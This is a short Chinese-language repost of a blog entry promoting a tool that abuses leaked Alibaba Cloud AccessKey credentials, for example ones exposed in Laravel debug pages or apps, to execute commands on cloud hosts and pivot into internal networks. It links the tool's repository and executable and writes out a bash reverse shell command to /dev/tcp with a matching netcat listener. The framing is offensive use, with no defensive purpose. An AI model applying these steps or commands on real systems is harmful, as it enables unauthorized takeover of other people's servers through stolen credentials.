【推荐】阿里云主机accesskey利用工具
生活随笔
收集整理的這篇文章主要介紹了
【推荐】阿里云主机accesskey利用工具
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
1、簡介
在日常滲透過程中我們經常遇到信息泄露出ALIYUN_ACCESSKEYID與ALIYUN_ACCESSKEYSECRET(阿里云API?key),特別是laravel框架得debug信息。APP中也會泄露這些信息.通過這款利用工具我們可以進行命令執行獲取到shell然后進行內網滲透。
具體的github地址如下:
https://github.com/mrknow001/aliyun-accesskey-Tools
exe文件下載地址:
https://github.com/mrknow001/aliyun-accesskey-Tools/releases/download/1.0/Aliyun-.AK.Tools.exe
?
工具截圖如下:
?
可在命令輸入處輸入反彈shell的代碼。
bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1
?
自己的機器執行:
nc -lvvp 端口??
總結
以上是生活随笔為你收集整理的【推荐】阿里云主机accesskey利用工具的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 常用谷歌地址和常用搜索引擎
- 下一篇: EDA 电子设计自动化VHDL系列课程1